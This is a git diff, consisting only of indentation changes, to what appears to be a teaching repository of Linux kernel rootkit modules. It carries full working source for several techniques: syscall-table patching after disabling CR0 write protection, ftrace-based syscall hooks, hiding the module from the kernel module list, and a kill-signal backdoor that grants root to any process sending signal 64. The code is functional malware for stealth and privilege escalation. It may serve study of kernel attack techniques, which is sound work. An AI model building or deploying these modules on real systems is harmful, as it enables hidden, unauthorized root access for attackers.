diff --git a/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c b/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c index c1c8828..c7a8f11 100644 --- a/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c +++ b/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c @@ -41,27 +41,27 @@ * Note that we call the real sys_mkdir() function at the end */ asmlinkage int hook_mkdir(const struct pt_regs *regs) { - char __user *pathname = (char *)regs->di; - char dir_name[NAME_MAX] = {0}; + char __user *pathname = (char *)regs->di; + char dir_name[NAME_MAX] = {0}; - /* Copy the directory name from userspace (pathname, from - * the pt_regs struct, to kernelspace (dir_name) so that we - * can print it out to the kernel buffer */ - long error = strncpy_from_user(dir_name, pathname, NAME_MAX); + /* Copy the directory name from userspace (pathname, from + * the pt_regs struct, to kernelspace (dir_name) so that we + * can print it out to the kernel buffer */ + long error = strncpy_from_user(dir_name, pathname, NAME_MAX); - if (error > 0) - printk(KERN_INFO "rootkit: Trying to create directory with name: %s\n", dir_name); + if (error > 0) + printk(KERN_INFO "rootkit: Trying to create directory with name: %s\n", dir_name); - /* Pass the pt_regs struct along to the original sys_mkdir syscall */ - orig_mkdir(regs); - return 0; + /* Pass the pt_regs struct along to the original sys_mkdir syscall */ + orig_mkdir(regs); + return 0; } /* The built in linux write_cr0() function stops us from modifying * the WP bit, so we write our own instead */ inline void cr0_write(unsigned long cr0) { - asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order)); + asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order)); } /* Bit 16 in the cr0 register is the W(rite) P(rotection) bit which @@ -69,52 +69,52 @@ * the syscall table, so we need to unset it first */ static inline void protect_memory(void) { - unsigned long cr0 = read_cr0(); - set_bit(16, &cr0); - cr0_write(cr0); + unsigned long cr0 = read_cr0(); + set_bit(16, &cr0); + cr0_write(cr0); } static inline void unprotect_memory(void) { - unsigned long cr0 = read_cr0(); - clear_bit(16, &cr0); - cr0_write(cr0); + unsigned long cr0 = read_cr0(); + clear_bit(16, &cr0); + cr0_write(cr0); } /* Module initialization function */ static int __init rootkit_init(void) { - /* Grab the syscall table, and make sure we succeeded */ - __sys_call_table = kallsyms_lookup_name("sys_call_table"); + /* Grab the syscall table, and make sure we succeeded */ + __sys_call_table = kallsyms_lookup_name("sys_call_table"); - /* Grab the function pointer to the real sys_mkdir syscall */ - orig_mkdir = (orig_mkdir_t)__sys_call_table[__NR_mkdir]; + /* Grab the function pointer to the real sys_mkdir syscall */ + orig_mkdir = (orig_mkdir_t)__sys_call_table[__NR_mkdir]; - printk(KERN_INFO "rootkit: Loaded >:-)\n"); - printk(KERN_DEBUG "rootkit: Found the syscall table at 0x%lx\n", __sys_call_table); - printk(KERN_DEBUG "rootkit: mkdir @ 0x%lx\n", orig_mkdir); - - unprotect_memory(); + printk(KERN_INFO "rootkit: Loaded >:-)\n"); + printk(KERN_DEBUG "rootkit: Found the syscall table at 0x%lx\n", __sys_call_table); + printk(KERN_DEBUG "rootkit: mkdir @ 0x%lx\n", orig_mkdir); + + unprotect_memory(); - printk(KERN_INFO "rootkit: hooking mkdir syscall\n"); - /* Patch the function pointer to sys_mkdir with our hook instead */ - __sys_call_table[__NR_mkdir] = (unsigned long)hook_mkdir; + printk(KERN_INFO "rootkit: hooking mkdir syscall\n"); + /* Patch the function pointer to sys_mkdir with our hook instead */ + __sys_call_table[__NR_mkdir] = (unsigned long)hook_mkdir; - protect_memory(); + protect_memory(); - return 0; + return 0; } static void __exit rootkit_exit(void) { - unprotect_memory(); - - printk(KERN_INFO "rootkit: restoring mkdir syscall\n"); - __sys_call_table[__NR_mkdir] = (unsigned long)orig_mkdir; - - protect_memory(); - - printk(KERN_INFO "rootkit: Unloaded :-(\n"); + unprotect_memory(); + + printk(KERN_INFO "rootkit: restoring mkdir syscall\n"); + __sys_call_table[__NR_mkdir] = (unsigned long)orig_mkdir; + + protect_memory(); + + printk(KERN_INFO "rootkit: Unloaded :-(\n"); } module_init(rootkit_init); diff --git a/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h b/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h index f3a0171..1624ce4 100644 --- a/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h +++ b/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h @@ -20,11 +20,11 @@ #define SYSCALL_NAME(name) (name) #endif -#define HOOK(_name, _hook, _orig) \ -{ \ - .name = SYSCALL_NAME(_name), \ - .function = (_hook), \ - .original = (_orig), \ +#define HOOK(_name, _hook, _orig) \ +{ \ + .name = SYSCALL_NAME(_name), \ + .function = (_hook), \ + .original = (_orig), \ } /* We need to prevent recursive loops when hooking, otherwise the kernel will @@ -46,12 +46,12 @@ * the entire struct off to fh_install_hook() later on. * */ struct ftrace_hook { - const char *name; - void *function; - void *original; + const char *name; + void *function; + void *original; - unsigned long address; - struct ftrace_ops ops; + unsigned long address; + struct ftrace_ops ops; }; /* Ftrace needs to know the address of the original function that we @@ -60,33 +60,33 @@ * */ static int fh_resolve_hook_address(struct ftrace_hook *hook) { - hook->address = kallsyms_lookup_name(hook->name); + hook->address = kallsyms_lookup_name(hook->name); - if (!hook->address) - { - printk(KERN_DEBUG "rootkit: unresolved symbol: %s\n", hook->name); - return -ENOENT; - } + if (!hook->address) + { + printk(KERN_DEBUG "rootkit: unresolved symbol: %s\n", hook->name); + return -ENOENT; + } #if USE_FENTRY_OFFSET - *((unsigned long*) hook->original) = hook->address + MCOUNT_INSN_SIZE; + *((unsigned long*) hook->original) = hook->address + MCOUNT_INSN_SIZE; #else - *((unsigned long*) hook->original) = hook->address; + *((unsigned long*) hook->original) = hook->address; #endif - return 0; + return 0; } /* See comment below within fh_install_hook() */ static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs) { - struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); + struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); #if USE_FENTRY_OFFSET - regs->ip = (unsigned long) hook->function; + regs->ip = (unsigned long) hook->function; #else - if(!within_module(parent_ip, THIS_MODULE)) - regs->ip = (unsigned long) hook->function; + if(!within_module(parent_ip, THIS_MODULE)) + regs->ip = (unsigned long) hook->function; #endif } @@ -98,38 +98,38 @@ * */ int fh_install_hook(struct ftrace_hook *hook) { - int err; - err = fh_resolve_hook_address(hook); - if(err) - return err; + int err; + err = fh_resolve_hook_address(hook); + if(err) + return err; - /* For many of function hooks (especially non-trivial ones), the $rip - * register gets modified, so we have to alert ftrace to this fact. This - * is the reason for the SAVE_REGS and IP_MODIFY flags. However, we also - * need to OR the RECURSION_SAFE flag (effectively turning if OFF) because - * the built-in anti-recursion guard provided by ftrace is useless if - * we're modifying $rip. This is why we have to implement our own checks - * (see USE_FENTRY_OFFSET). */ - hook->ops.func = fh_ftrace_thunk; - hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS - | FTRACE_OPS_FL_RECURSION_SAFE - | FTRACE_OPS_FL_IPMODIFY; + /* For many of function hooks (especially non-trivial ones), the $rip + * register gets modified, so we have to alert ftrace to this fact. This + * is the reason for the SAVE_REGS and IP_MODIFY flags. However, we also + * need to OR the RECURSION_SAFE flag (effectively turning if OFF) because + * the built-in anti-recursion guard provided by ftrace is useless if + * we're modifying $rip. This is why we have to implement our own checks + * (see USE_FENTRY_OFFSET). */ + hook->ops.func = fh_ftrace_thunk; + hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS + | FTRACE_OPS_FL_RECURSION_SAFE + | FTRACE_OPS_FL_IPMODIFY; - err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0); - if(err) - { - printk(KERN_DEBUG "rootkit: ftrace_set_filter_ip() failed: %d\n", err); - return err; - } + err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0); + if(err) + { + printk(KERN_DEBUG "rootkit: ftrace_set_filter_ip() failed: %d\n", err); + return err; + } - err = register_ftrace_function(&hook->ops); - if(err) - { - printk(KERN_DEBUG "rootkit: register_ftrace_function() failed: %d\n", err); - return err; - } + err = register_ftrace_function(&hook->ops); + if(err) + { + printk(KERN_DEBUG "rootkit: register_ftrace_function() failed: %d\n", err); + return err; + } - return 0; + return 0; } /* Disabling our function hook is just a simple matter of calling the built-in @@ -138,18 +138,18 @@ * */ void fh_remove_hook(struct ftrace_hook *hook) { - int err; - err = unregister_ftrace_function(&hook->ops); - if(err) - { - printk(KERN_DEBUG "rootkit: unregister_ftrace_function() failed: %d\n", err); - } + int err; + err = unregister_ftrace_function(&hook->ops); + if(err) + { + printk(KERN_DEBUG "rootkit: unregister_ftrace_function() failed: %d\n", err); + } - err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0); - if(err) - { - printk(KERN_DEBUG "rootkit: ftrace_set_filter_ip() failed: %d\n", err); - } + err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0); + if(err) + { + printk(KERN_DEBUG "rootkit: ftrace_set_filter_ip() failed: %d\n", err); + } } /* To make it easier to hook multiple functions in one module, this provides @@ -157,29 +157,29 @@ * */ int fh_install_hooks(struct ftrace_hook *hooks, size_t count) { - int err; - size_t i; + int err; + size_t i; - for (i = 0 ; i < count ; i++) - { - err = fh_install_hook(&hooks[i]); - if(err) - goto error; - } - return 0; + for (i = 0 ; i < count ; i++) + { + err = fh_install_hook(&hooks[i]); + if(err) + goto error; + } + return 0; error: - while (i != 0) - { - fh_remove_hook(&hooks[--i]); - } - return err; + while (i != 0) + { + fh_remove_hook(&hooks[--i]); + } + return err; } void fh_remove_hooks(struct ftrace_hook *hooks, size_t count) { - size_t i; + size_t i; - for (i = 0 ; i < count ; i++) - fh_remove_hook(&hooks[i]); + for (i = 0 ; i < count ; i++) + fh_remove_hook(&hooks[i]); } diff --git a/3_RootkitTechniques/3.2_kill_signalling/rootkit.c b/3_RootkitTechniques/3.2_kill_signalling/rootkit.c index 074e60e..416f275 100644 --- a/3_RootkitTechniques/3.2_kill_signalling/rootkit.c +++ b/3_RootkitTechniques/3.2_kill_signalling/rootkit.c @@ -38,28 +38,28 @@ * syscall with the arguments passed via pt_regs. */ asmlinkage int hook_kill(const struct pt_regs *regs) { - void showme(void); - void hideme(void); + void showme(void); + void hideme(void); - // pid_t pid = regs->di; - int sig = regs->si; + // pid_t pid = regs->di; + int sig = regs->si; - if ( (sig == 64) && (hidden == 0) ) - { - printk(KERN_INFO "rootkit: hiding rootkit kernel module...\n"); - hideme(); - hidden = 1; - } - else if ( (sig == 64) && (hidden == 1) ) - { - printk(KERN_INFO "rootkit: revealing rootkit kernel module...\n"); - showme(); - hidden = 0; - } - else - { - return orig_kill(regs); - } + if ( (sig == 64) && (hidden == 0) ) + { + printk(KERN_INFO "rootkit: hiding rootkit kernel module...\n"); + hideme(); + hidden = 1; + } + else if ( (sig == 64) && (hidden == 1) ) + { + printk(KERN_INFO "rootkit: revealing rootkit kernel module...\n"); + showme(); + hidden = 0; + } + else + { + return orig_kill(regs); + } } #else /* This is the old way of declaring a syscall hook */ @@ -67,25 +67,25 @@ static asmlinkage int hook_kill(pid_t pid, int sig) { - void showme(void); - void hideme(void); + void showme(void); + void hideme(void); - if ( (sig == 64) && (hidden == 0) ) - { - printk(KERN_INFO "rootkit: hiding rootkit kernel module...\n"); - hideme(); - hidden = 1; - } - else if ( (sig == 64) && (hidden == 1) ) - { - printk(KERN_INFO "rootkit: revealing rootkit kernel module...\n"); - showme(); - hidden = 0; - } - else - { - return orig_kill(pid, sig); - } + if ( (sig == 64) && (hidden == 0) ) + { + printk(KERN_INFO "rootkit: hiding rootkit kernel module...\n"); + hideme(); + hidden = 1; + } + else if ( (sig == 64) && (hidden == 1) ) + { + printk(KERN_INFO "rootkit: revealing rootkit kernel module...\n"); + showme(); + hidden = 0; + } + else + { + return orig_kill(pid, sig); + } } #endif @@ -93,7 +93,7 @@ * specified by prev_module */ void showme(void) { - list_add(&THIS_MODULE->list, prev_module); + list_add(&THIS_MODULE->list, prev_module); } /* Record where we are in the loaded module list by storing @@ -101,34 +101,34 @@ * from the list */ void hideme(void) { - prev_module = THIS_MODULE->list.prev; - list_del(&THIS_MODULE->list); + prev_module = THIS_MODULE->list.prev; + list_del(&THIS_MODULE->list); } /* Declare the struct that ftrace needs to hook the syscall */ static struct ftrace_hook hooks[] = { - HOOK("sys_kill", hook_kill, &orig_kill), + HOOK("sys_kill", hook_kill, &orig_kill), }; /* Module initialization function */ static int __init rootkit_init(void) { - /* Hook the syscall and print to the kernel buffer */ - int err; - err = fh_install_hooks(hooks, ARRAY_SIZE(hooks)); - if(err) - return err; + /* Hook the syscall and print to the kernel buffer */ + int err; + err = fh_install_hooks(hooks, ARRAY_SIZE(hooks)); + if(err) + return err; - printk(KERN_INFO "rootkit: Loaded >:-)\n"); + printk(KERN_INFO "rootkit: Loaded >:-)\n"); - return 0; + return 0; } static void __exit rootkit_exit(void) { - /* Unhook and restore the syscall and print to the kernel buffer */ - fh_remove_hooks(hooks, ARRAY_SIZE(hooks)); - printk(KERN_INFO "rootkit: Unloaded :-(\n"); + /* Unhook and restore the syscall and print to the kernel buffer */ + fh_remove_hooks(hooks, ARRAY_SIZE(hooks)); + printk(KERN_INFO "rootkit: Unloaded :-(\n"); } module_init(rootkit_init); diff --git a/3_RootkitTechniques/3.3_set_root/ftrace_helper.h b/3_RootkitTechniques/3.3_set_root/ftrace_helper.h index f3a0171..1624ce4 100644 --- a/3_RootkitTechniques/3.3_set_root/ftrace_helper.h +++ b/3_RootkitTechniques/3.3_set_root/ftrace_helper.h @@ -20,11 +20,11 @@ #define SYSCALL_NAME(name) (name) #endif -#define HOOK(_name, _hook, _orig) \ -{ \ - .name = SYSCALL_NAME(_name), \ - .function = (_hook), \ - .original = (_orig), \ +#define HOOK(_name, _hook, _orig) \ +{ \ + .name = SYSCALL_NAME(_name), \ + .function = (_hook), \ + .original = (_orig), \ } /* We need to prevent recursive loops when hooking, otherwise the kernel will @@ -46,12 +46,12 @@ * the entire struct off to fh_install_hook() later on. * */ struct ftrace_hook { - const char *name; - void *function; - void *original; + const char *name; + void *function; + void *original; - unsigned long address; - struct ftrace_ops ops; + unsigned long address; + struct ftrace_ops ops; }; /* Ftrace needs to know the address of the original function that we @@ -60,33 +60,33 @@ * */ static int fh_resolve_hook_address(struct ftrace_hook *hook) { - hook->address = kallsyms_lookup_name(hook->name); + hook->address = kallsyms_lookup_name(hook->name); - if (!hook->address) - { - printk(KERN_DEBUG "rootkit: unresolved symbol: %s\n", hook->name); - return -ENOENT; - } + if (!hook->address) + { + printk(KERN_DEBUG "rootkit: unresolved symbol: %s\n", hook->name); + return -ENOENT; + } #if USE_FENTRY_OFFSET - *((unsigned long*) hook->original) = hook->address + MCOUNT_INSN_SIZE; + *((unsigned long*) hook->original) = hook->address + MCOUNT_INSN_SIZE; #else - *((unsigned long*) hook->original) = hook->address; + *((unsigned long*) hook->original) = hook->address; #endif - return 0; + return 0; } /* See comment below within fh_install_hook() */ static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs) { - struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); + struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); #if USE_FENTRY_OFFSET - regs->ip = (unsigned long) hook->function; + regs->ip = (unsigned long) hook->function; #else - if(!within_module(parent_ip, THIS_MODULE)) - regs->ip = (unsigned long) hook->function; + if(!within_module(parent_ip, THIS_MODULE)) + regs->ip = (unsigned long) hook->function; #endif } @@ -98,38 +98,38 @@ * */ int fh_install_hook(struct ftrace_hook *hook) { - int err; - err = fh_resolve_hook_address(hook); - if(err) - return err; + int err; + err = fh_resolve_hook_address(hook); + if(err) + return err; - /* For many of function hooks (especially non-trivial ones), the $rip - * register gets modified, so we have to alert ftrace to this fact. This - * is the reason for the SAVE_REGS and IP_MODIFY flags. However, we also - * need to OR the RECURSION_SAFE flag (effectively turning if OFF) because - * the built-in anti-recursion guard provided by ftrace is useless if - * we're modifying $rip. This is why we have to implement our own checks - * (see USE_FENTRY_OFFSET). */ - hook->ops.func = fh_ftrace_thunk; - hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS - | FTRACE_OPS_FL_RECURSION_SAFE - | FTRACE_OPS_FL_IPMODIFY; + /* For many of function hooks (especially non-trivial ones), the $rip + * register gets modified, so we have to alert ftrace to this fact. This + * is the reason for the SAVE_REGS and IP_MODIFY flags. However, we also + * need to OR the RECURSION_SAFE flag (effectively turning if OFF) because + * the built-in anti-recursion guard provided by ftrace is useless if + * we're modifying $rip. This is why we have to implement our own checks + * (see USE_FENTRY_OFFSET). */ + hook->ops.func = fh_ftrace_thunk; + hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS + | FTRACE_OPS_FL_RECURSION_SAFE + | FTRACE_OPS_FL_IPMODIFY; - err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0); - if(err) - { - printk(KERN_DEBUG "rootkit: ftrace_set_filter_ip() failed: %d\n", err); - return err; - } + err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0); + if(err) + { + printk(KERN_DEBUG "rootkit: ftrace_set_filter_ip() failed: %d\n", err); + return err; + } - err = register_ftrace_function(&hook->ops); - if(err) - { - printk(KERN_DEBUG "rootkit: register_ftrace_function() failed: %d\n", err); - return err; - } + err = register_ftrace_function(&hook->ops); + if(err) + { + printk(KERN_DEBUG "rootkit: register_ftrace_function() failed: %d\n", err); + return err; + } - return 0; + return 0; } /* Disabling our function hook is just a simple matter of calling the built-in @@ -138,18 +138,18 @@ * */ void fh_remove_hook(struct ftrace_hook *hook) { - int err; - err = unregister_ftrace_function(&hook->ops); - if(err) - { - printk(KERN_DEBUG "rootkit: unregister_ftrace_function() failed: %d\n", err); - } + int err; + err = unregister_ftrace_function(&hook->ops); + if(err) + { + printk(KERN_DEBUG "rootkit: unregister_ftrace_function() failed: %d\n", err); + } - err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0); - if(err) - { - printk(KERN_DEBUG "rootkit: ftrace_set_filter_ip() failed: %d\n", err); - } + err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0); + if(err) + { + printk(KERN_DEBUG "rootkit: ftrace_set_filter_ip() failed: %d\n", err); + } } /* To make it easier to hook multiple functions in one module, this provides @@ -157,29 +157,29 @@ * */ int fh_install_hooks(struct ftrace_hook *hooks, size_t count) { - int err; - size_t i; + int err; + size_t i; - for (i = 0 ; i < count ; i++) - { - err = fh_install_hook(&hooks[i]); - if(err) - goto error; - } - return 0; + for (i = 0 ; i < count ; i++) + { + err = fh_install_hook(&hooks[i]); + if(err) + goto error; + } + return 0; error: - while (i != 0) - { - fh_remove_hook(&hooks[--i]); - } - return err; + while (i != 0) + { + fh_remove_hook(&hooks[--i]); + } + return err; } void fh_remove_hooks(struct ftrace_hook *hooks, size_t count) { - size_t i; + size_t i; - for (i = 0 ; i < count ; i++) - fh_remove_hook(&hooks[i]); + for (i = 0 ; i < count ; i++) + fh_remove_hook(&hooks[i]); } diff --git a/3_RootkitTechniques/3.3_set_root/rootkit.c b/3_RootkitTechniques/3.3_set_root/rootkit.c index 98833cd..fd0b3cc 100644 --- a/3_RootkitTechniques/3.3_set_root/rootkit.c +++ b/3_RootkitTechniques/3.3_set_root/rootkit.c @@ -33,19 +33,19 @@ * and then call the set_root() function. */ asmlinkage int hook_kill(const struct pt_regs *regs) { - void set_root(void); + void set_root(void); - // pid_t pid = regs->di; - int sig = regs->si; + // pid_t pid = regs->di; + int sig = regs->si; - if ( sig == 64 ) - { - printk(KERN_INFO "rootkit: giving root...\n"); - set_root(); - return 0; - } + if ( sig == 64 ) + { + printk(KERN_INFO "rootkit: giving root...\n"); + set_root(); + return 0; + } - return orig_kill(regs); + return orig_kill(regs); } #else @@ -54,16 +54,16 @@ static asmlinkage int hook_kill(pid_t pid, int sig) { - void set_root(void); + void set_root(void); - if ( sig == 64 ) - { - printk(KERN_INFO "rootkit: giving root...\n"); - set_root(); - return 0; - } + if ( sig == 64 ) + { + printk(KERN_INFO "rootkit: giving root...\n"); + set_root(); + return 0; + } - return orig_kill(pid, sig); + return orig_kill(pid, sig); } #endif @@ -71,47 +71,47 @@ * with root's */ void set_root(void) { - /* prepare_creds returns the current credentials of the process */ - struct cred *root; - root = prepare_creds(); + /* prepare_creds returns the current credentials of the process */ + struct cred *root; + root = prepare_creds(); - if (root == NULL) - return; + if (root == NULL) + return; - /* Run through and set all the various *id's to 0 (root) */ - root->uid.val = root->gid.val = 0; - root->euid.val = root->egid.val = 0; - root->suid.val = root->sgid.val = 0; - root->fsuid.val = root->fsgid.val = 0; + /* Run through and set all the various *id's to 0 (root) */ + root->uid.val = root->gid.val = 0; + root->euid.val = root->egid.val = 0; + root->suid.val = root->sgid.val = 0; + root->fsuid.val = root->fsgid.val = 0; - /* Set the cred struct that we've modified to that of the calling process */ - commit_creds(root); + /* Set the cred struct that we've modified to that of the calling process */ + commit_creds(root); } /* Declare the struct that ftrace needs to hook the syscall */ static struct ftrace_hook hooks[] = { - HOOK("sys_kill", hook_kill, &orig_kill), + HOOK("sys_kill", hook_kill, &orig_kill), }; /* Module initialization function */ static int __init rootkit_init(void) { - /* Hook the syscall and print to the kernel buffer */ - int err; - err = fh_install_hooks(hooks, ARRAY_SIZE(hooks)); - if(err) - return err; + /* Hook the syscall and print to the kernel buffer */ + int err; + err = fh_install_hooks(hooks, ARRAY_SIZE(hooks)); + if(err) + return err; - printk(KERN_INFO "rootkit: Loaded >:-)\n"); + printk(KERN_INFO "rootkit: Loaded >:-)\n"); - return 0; + return 0; } static void __exit rootkit_exit(void) { - /* Unhook and restore the syscall and print to the kernel buffer */ - fh_remove_hooks(hooks, ARRAY_SIZE(hooks)); - printk(KERN_INFO "rootkit: Unloaded :-(\n"); + /* Unhook and restore the syscall and print to the kernel buffer */ + fh_remove_hooks(hooks, ARRAY_SIZE(hooks)); + printk(KERN_INFO "rootkit: Unloaded :-(\n"); } module_init(rootkit_init);